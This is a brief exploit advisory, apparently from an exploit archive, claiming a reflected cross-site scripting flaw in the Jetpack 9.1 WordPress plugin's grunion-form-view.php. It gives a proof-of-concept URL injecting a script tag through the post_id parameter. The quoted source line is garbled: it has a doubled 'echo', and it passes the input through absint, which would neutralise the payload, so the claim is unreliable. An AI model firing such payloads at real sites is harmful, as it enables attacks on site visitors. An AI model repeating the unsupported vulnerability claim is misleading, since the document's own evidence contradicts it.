[-] Title : Wordpress Plugin Jetpack 9.1 - Cross Site Scripting
[-] Author : OmideMehraban
[-] Vendor : https://wordpress.org/plugins/jetpack
[-] Category : Webapps
[-] Date : 2020-11-10
Vulnerable Page:
/grunion-form-view.php
Vulnerable Source:
59: echo echo absint($_GET['post_id']);
Exploit:
http://localhost/modules/contact-form/grunion-form-view.php?post_id=<script>alert("test")</script>
*********************************************************
* Discovered By OmideMehraban
* Instagram: @omidemehraban
* Telegram: @omiid
*********************************************************